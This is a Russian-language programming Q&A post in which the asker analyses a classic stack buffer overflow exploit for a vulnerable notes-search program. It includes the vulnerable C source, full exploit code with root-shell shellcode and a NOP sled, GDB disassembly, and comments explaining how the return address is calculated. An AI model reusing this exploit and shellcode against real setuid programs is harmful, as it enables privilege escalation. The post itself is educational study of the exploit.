# Эксплоит переполнения буфера, получение адреса возврата, сегфолт

Tags: c, ассемблер, безопасность

Уязвимая программа:

```
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // note printing function
int find_user_note(int, int);        // seek in file for a note for user
int search_note(char *, char *);     // search for keyword function
void fatal(char *);                  // fatal error handler

int main(int argc, char *argv[]) {
    int userid, printing=1, fd; // file descriptor
    char searchstring[100];

    if(argc > 1)                        // If there is an arg
        strcpy(searchstring, argv[1]);   //   that is the search string
    else                                // otherwise
        searchstring[0] = 0;             //   search string is empty

    userid = getuid();
    fd = open(FILENAME, O_RDONLY);   // open the file for read-only access
    if(fd == -1)
        fatal("in main() while opening file for reading");

    while(printing)
        printing = print_notes(fd, userid, searchstring);
    printf("-------[ end of note data ]-------\n");
    close(fd);
}

// A function to print the notes for a given uid that match
// an optional search string
// returns 0 at end of file, 1 if there are still more notes
int print_notes(int fd, int uid, char *searchstring) {
    int note_length;
    char byte=0, note_buffer[100];

    note_length = find_user_note(fd, uid);
    if(note_length == -1)  // if end of file reached
        return 0;           //   return 0

    read(fd, note_buffer, note_length); // read note data
    note_buffer[note_length] = 0;       // terminate the string

    if(search_note(note_buffer, searchstring)) // if searchstring found
        printf(note_buffer);                    //   print the note
    return 1;
}

// A function to find the next note for a given userID
// returns -1 if the end of the file is reached
// otherwise it returns the length of the found note
int find_user_note(int fd, int user_uid) {
    int note_uid=-1;
    unsigned char byte;
    int length;

    while(note_uid != user_uid) {  // loop until a note for user_uid is found
        if(read(fd, &note_uid, 4) != 4) // read the uid data
            return -1; // if 4 bytes aren't read, return end of file code
        if(read(fd, &byte, 1) != 1) // read the newline separator
         return -1;

        byte = length = 0;
        while(byte != '\n') {  // figure out how many bytes to the end of line
            if(read(fd, &byte, 1) != 1) // read a single byte
                return -1;     // if byte isn't read, return end of file code
            length++;  
        }
    }
    lseek(fd, length * -1, SEEK_CUR); // rewind file reading by length bytes

    printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
    return length;
}

// A function to search a note for a given keyword
// returns 1 if a match is found, 0 if there is no match
int search_note(char *note, char *keyword) {
    int i, keyword_length, match=0;

    keyword_length = strlen(keyword);
    if(keyword_length == 0)  // if there is no search string
        return 1;              // always "match"

    for(i=0; i < strlen(note); i++) { // iterate over bytes in note
        if(note[i] == keyword[match])  // if byte matches keyword
            match++;   // get ready to check the next byte
        else {        //   otherwise
            if(note[i] == keyword[0]) // if that byte matches first keyword byte
                match = 1;  // start the match count at 1
            else
                match = 0;  // otherwise it is zero
        }
        if(match == keyword_length) // if there is a full match
            return 1;   // return matched
    }
    return 0;  // return not matched
}
```

Эта программа читает записи текущего пользователя из файла `/var/notes`. В этом файле записи маркируются `UID`-ами пользователей: сначала `UID` на новой строке, затем запись на следующей. Вначале получается `UID` текущего пользователя, затем для него ищутся записи. Программе можно передавать строку, которую надо найти в записях. Тогда выводятся только записи с этой строкой. Если строка не задана, выводится все записи. Буфер для строки поиска занимает `100` байт.

Эксплоит для нее:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}
```

Здесь формируется команда, которую должна выполнить система: сначала в `command` записывается название программы для выполнения, пробел, и в кавычках шеллкод.

Содержимое массива `command` после его заполнения:

[image: введите сюда описание изображения]

Дизассемблерный листинг `main`:

```
Dump of assembler code for function main:
   0x0804853b <+0>: lea    ecx,[esp+0x4]
   0x0804853f <+4>: and    esp,0xfffffff0
   0x08048542 <+7>: push   DWORD PTR [ecx-0x4]
   0x08048545 <+10>:    push   ebp
   0x08048546 <+11>:    mov    ebp,esp
   0x08048548 <+13>:    push   edi
   0x08048549 <+14>:    push   ebx
   0x0804854a <+15>:    push   ecx
   0x0804854b <+16>:    sub    esp,0x2c
   0x0804854e <+19>:    mov    ebx,ecx
   0x08048550 <+21>:    mov    DWORD PTR [ebp-0x1c],0x10e
   0x08048557 <+28>:    sub    esp,0xc
   0x0804855a <+31>:    push   0xc8
   0x0804855f <+36>:    call   0x80483d0 <malloc@plt>
   0x08048564 <+41>:    add    esp,0x10
   0x08048567 <+44>:    mov    DWORD PTR [ebp-0x20],eax
   0x0804856a <+47>:    sub    esp,0x8
   0x0804856d <+50>:    push   0xc8
   0x08048572 <+55>:    push   DWORD PTR [ebp-0x20]
   0x08048575 <+58>:    call   0x80483c0 <bzero@plt>
   0x0804857a <+63>:    add    esp,0x10
   0x0804857d <+66>:    mov    eax,DWORD PTR [ebp-0x20]
   0x08048580 <+69>:    mov    DWORD PTR [eax],0x6f6e2f2e
   0x08048586 <+75>:    mov    DWORD PTR [eax+0x4],0x65736574
   0x0804858d <+82>:    mov    DWORD PTR [eax+0x8],0x68637261
   0x08048594 <+89>:    mov    WORD PTR [eax+0xc],0x2720
   0x0804859a <+95>:    mov    BYTE PTR [eax+0xe],0x0
   0x0804859e <+99>:    sub    esp,0xc
   0x080485a1 <+102>:   push   DWORD PTR [ebp-0x20]
   0x080485a4 <+105>:   call   0x80483f0 <strlen@plt>
   0x080485a9 <+110>:   add    esp,0x10
   0x080485ac <+113>:   mov    edx,eax
   0x080485ae <+115>:   mov    eax,DWORD PTR [ebp-0x20]
   0x080485b1 <+118>:   add    eax,edx
   0x080485b3 <+120>:   mov    DWORD PTR [ebp-0x24],eax
   0x080485b6 <+123>:   cmp    DWORD PTR [ebx],0x1
   0x080485b9 <+126>:   jle    0x80485d2 <main+151>
   0x080485bb <+128>:   mov    eax,DWORD PTR [ebx+0x4]
   0x080485be <+131>:   add    eax,0x4
   0x080485c1 <+134>:   mov    eax,DWORD PTR [eax]
   0x080485c3 <+136>:   sub    esp,0xc
   0x080485c6 <+139>:   push   eax
   0x080485c7 <+140>:   call   0x8048420 <atoi@plt>
   0x080485cc <+145>:   add    esp,0x10
   0x080485cf <+148>:   mov    DWORD PTR [ebp-0x1c],eax
   0x080485d2 <+151>:   lea    eax,[ebp-0x2c]
   0x080485d5 <+154>:   sub    eax,DWORD PTR [ebp-0x1c]
   0x080485d8 <+157>:   mov    DWORD PTR [ebp-0x28],eax
   0x080485db <+160>:   mov    DWORD PTR [ebp-0x2c],0x0
   0x080485e2 <+167>:   jmp    0x80485fa <main+191>
---Type <return> to continue, or q <return> to quit---
   0x080485e4 <+169>:   mov    edx,DWORD PTR [ebp-0x2c]
   0x080485e7 <+172>:   mov    eax,DWORD PTR [ebp-0x24]
   0x080485ea <+175>:   add    edx,eax
   0x080485ec <+177>:   mov    eax,DWORD PTR [ebp-0x28]
   0x080485ef <+180>:   mov    DWORD PTR [edx],eax
   0x080485f1 <+182>:   mov    eax,DWORD PTR [ebp-0x2c]
   0x080485f4 <+185>:   add    eax,0x4
   0x080485f7 <+188>:   mov    DWORD PTR [ebp-0x2c],eax
   0x080485fa <+191>:   mov    eax,DWORD PTR [ebp-0x2c]
   0x080485fd <+194>:   cmp    eax,0x9f
   0x08048602 <+199>:   jbe    0x80485e4 <main+169>
   0x08048604 <+201>:   sub    esp,0x4
   0x08048607 <+204>:   push   0x3c
   0x08048609 <+206>:   push   0x90
   0x0804860e <+211>:   push   DWORD PTR [ebp-0x24]
   0x08048611 <+214>:   call   0x8048410 <memset@plt>
   0x08048616 <+219>:   add    esp,0x10
   0x08048619 <+222>:   mov    eax,DWORD PTR [ebp-0x24]
   0x0804861c <+225>:   add    eax,0x3c
   0x0804861f <+228>:   sub    esp,0x4
   0x08048622 <+231>:   push   0x23
   0x08048624 <+233>:   push   0x8049960
   0x08048629 <+238>:   push   eax
   0x0804862a <+239>:   call   0x80483b0 <memcpy@plt>
   0x0804862f <+244>:   add    esp,0x10
   0x08048632 <+247>:   mov    eax,DWORD PTR [ebp-0x20]
   0x08048635 <+250>:   mov    ecx,0xffffffff
   0x0804863a <+255>:   mov    edx,eax
   0x0804863c <+257>:   mov    eax,0x0
   0x08048641 <+262>:   mov    edi,edx
   0x08048643 <+264>:   repnz scas al,BYTE PTR es:[edi]
   0x08048645 <+266>:   mov    eax,ecx
   0x08048647 <+268>:   not    eax
   0x08048649 <+270>:   lea    edx,[eax-0x1]
   0x0804864c <+273>:   mov    eax,DWORD PTR [ebp-0x20]
   0x0804864f <+276>:   add    eax,edx
   0x08048651 <+278>:   mov    WORD PTR [eax],0x27
=> 0x08048656 <+283>:   sub    esp,0xc
   0x08048659 <+286>:   push   DWORD PTR [ebp-0x20]
   0x0804865c <+289>:   call   0x80483e0 <system@plt>
   0x08048661 <+294>:   add    esp,0x10
   0x08048664 <+297>:   sub    esp,0xc
   0x08048667 <+300>:   push   DWORD PTR [ebp-0x20]
   0x0804866a <+303>:   call   0x80483a0 <free@plt>
   0x0804866f <+308>:   add    esp,0x10
   0x08048672 <+311>:   mov    eax,0x0
   0x08048677 <+316>:   lea    esp,[ebp-0xc]
   0x0804867a <+319>:   pop    ecx
   0x0804867b <+320>:   pop    ebx
   0x0804867c <+321>:   pop    edi
   0x0804867d <+322>:   pop    ebp
---Type <return> to continue, or q <return> to quit---
   0x0804867e <+323>:   lea    esp,[ecx-0x4]
   0x08048681 <+326>:   ret    
End of assembler dump.
```

Как работает эта строка `ret = (unsigned int) &i - offset;`?

Здесь каким-то образом получается адрес возврата. Видимо, автор надеется, что компилятор расположит переменную `i` сразу после адреса возврата и сохраненного `ebp` в стеке. Тогда при помощи ее адреса можно будет добраться до адреса возврата. Но тогда почему используется такое большое смещение `offset = 270`?

Вот что показывает `GDB`:

```
22     ret = (unsigned int) &i - offset; // set return address
(gdb) x/20i $eip
=> 0x80485d2 <main+151>:    lea    eax,[ebp-0x2c]
   0x80485d5 <main+154>:    sub    eax,DWORD PTR [ebp-0x1c]
   0x80485d8 <main+157>:    mov    DWORD PTR [ebp-0x28],eax
   0x80485db <main+160>:    mov    DWORD PTR [ebp-0x2c],0x0
   0x80485e2 <main+167>:    jmp    0x80485fa <main+191>
   0x80485e4 <main+169>:    mov    edx,DWORD PTR [ebp-0x2c]
   0x80485e7 <main+172>:    mov    eax,DWORD PTR [ebp-0x24]
   0x80485ea <main+175>:    add    edx,eax
   0x80485ec <main+177>:    mov    eax,DWORD PTR [ebp-0x28]
   0x80485ef <main+180>:    mov    DWORD PTR [edx],eax
   0x80485f1 <main+182>:    mov    eax,DWORD PTR [ebp-0x2c]
   0x80485f4 <main+185>:    add    eax,0x4
   0x80485f7 <main+188>:    mov    DWORD PTR [ebp-0x2c],eax
   0x80485fa <main+191>:    mov    eax,DWORD PTR [ebp-0x2c]
   0x80485fd <main+194>:    cmp    eax,0x9f
   0x8048602 <main+199>:    jbe    0x80485e4 <main+169>
   0x8048604 <main+201>:    sub    esp,0x4
   0x8048607 <main+204>:    push   0x3c
   0x8048609 <main+206>:    push   0x90
   0x804860e <main+211>:    push   DWORD PTR [ebp-0x24]
```

Видно, что переменная `i` располагается по смещению `-0x2c`: `lea    eax,[ebp-0x2c]`. Проверим, что это в самом деле она:

```
(gdb) x/xw $ebp-0x2c
0xbffff40c: 0x0000b5ba
(gdb) set var i = 5
(gdb) x/xw $ebp-0x2c
0xbffff40c: 0x00000005
```

То есть получается так: сразу после запуска программы в стеке хранятся такие числа:

1. saved frame pointer (SFP): сохраненный EBP
2. ret - адрес возврата

В `EBP` копируется текущее значение `ESP` и из `ESP` вычитается какое-то число, освобождая свободное пространство для локальных переменных. Переменная `i` оказалась слишком далеко от адреса возврата! На `0x2c` выше сохраненного `ebp`.

Как в этой строке можно получить адрес возврата? Из-за чего при выполнении этой программы происходит сегфолт?

```
[DEBUG] found a 34 byte note for user id 77
[DEBUG] found a 10 byte note for user id 77
-------[ end of note data ]-------
Segmentation fault
```

Comment: Я, похоже, не совсем понял логику эксплоита. Адрес возврата берется при выполнении уязвимой программы, а не этой.

Comment: Не понимаю, почему  для вычисления адреса возврата Вы из адреса локальной переменной **вычитаете offset** ? Стек же растет в сторону меньших адресов, следовательно запомненный адрес возврата будет в стеке с адресом **большим**, чем у локальной переменной.

Comment: Я разбираю чужой эксплоит. Строчка с использованием offset мне вообще непонятна, это самое магическое место в программе. Было бы неплохо изучить, как ведет себя уязвимая программа после передачи ей строки с шеллкодом, но я не знаю, как в GDB подключиться к ней после ее вызова функцией system.

Comment: К тому же для чего-то автор задумал настройку этого смещения при помощи передачи параметра программе. Может, хотел написать скрипт на перле, который бы подбирал нужное смещение, если стандартное почему-то не сработало?

Comment: А это работающий вариант? Может Вы мусор какой-то анализируете?

Comment: Да, работающий.

Comment: Ага, кажется понял. Он настраивает эксплойт в своем стеке (в строке `command`), поскольку потом сам вызывает "жертву" через system.

Comment: Да, так и работает.